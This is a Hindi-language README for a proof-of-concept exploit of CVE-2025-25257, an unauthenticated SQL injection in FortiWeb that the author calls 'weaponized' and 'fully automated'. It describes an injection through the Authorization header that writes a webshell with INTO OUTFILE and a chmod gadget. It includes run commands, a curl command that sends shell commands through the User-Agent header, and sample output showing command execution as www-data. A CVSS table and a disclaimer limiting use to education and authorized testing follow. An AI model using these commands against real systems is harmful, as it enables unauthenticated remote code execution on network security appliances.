
CVE-2025-25257 के लिए PoC, FortiWeb में एक गंभीर बिना प्रमाणीकरण के SQL इंजेक्शन। Authorization हेडर के माध्यम से SQLi का शोषण करके वेबशेल लिखता है और RCE प्राप्त करता है। लॉगिन आवश्यक नहीं। पूरी तरह से स्वचालित।
महत्वपूर्ण SQL इंजेक्शन → वेबशेल निष्पादन
0xgh057r3c0n द्वारा खोजा और शस्त्रीकृत किया गया
CVE-2025-25257 FortiWeb सिस्टम को प्रभावित करता है जो /api/fabric/device/status एंडपॉइंट को उजागर करता है, जो Authorization हेडर इनपुट को ठीक से सैनिटाइज़ करने में विफल रहता है।
एक हमलावर सर्वर पर वेबशेल लिखने और दूरस्थ रूप से कमांड निष्पादित करने के लिए बिना प्रमाणीकरण के SQL इंजेक्शन कर सकता है।
SQL Injection ➜ SQL INTO OUTFILE ➜ Python chmod Gadget ➜ Trigger ➜ Webshell RCE
GET /api/fabric/device/status
Header: Authorization: Bearer ';<SQLi>
INTO OUTFILEpython3 CVE-2025-25257.py -t https://target-host.com
तब:
curl -k -H "User-Agent: whoami" https://target-host.com/cgi-bin/x.cgi
requests मॉड्यूलइंस्टॉल करें:
pip install requests
[*] Writing Webshell Chunk: #!/bin/sh ...
[>] Exporting Webshell to File...
[*] Writing Chmod Gadget Chunk: import os ...
[>] Triggering chmod via Python Hook...
[*] Executing `id` via Webshell...
uid=33(www-data) gid=33(www-data)
[+] Webshell Ready:
> https://target-host.com/cgi-bin/x.cgi
> Send commands via User-Agent header
| मीट्रिक | मान |
|---|---|
| आधार स्कोर | 9.8 (गंभीर) |
| हमला वेक्टर | नेटवर्क |
| आवश्यक विशेषाधिकार | कोई नहीं |
| उपयोगकर्ता संपर्क | कोई नहीं |
0xgh057r3c0n 🔗 github.com/0xgh057r3c0n
यह प्रमाण-अवधारणा केवल शैक्षिक और अधिकृत परीक्षण के लिए है। अपने जोखिम पर उपयोग करें। लेखक दुरुपयोग के लिए जिम्मेदार नहीं है।
| प्रभाव | उच्च (C/I/A) |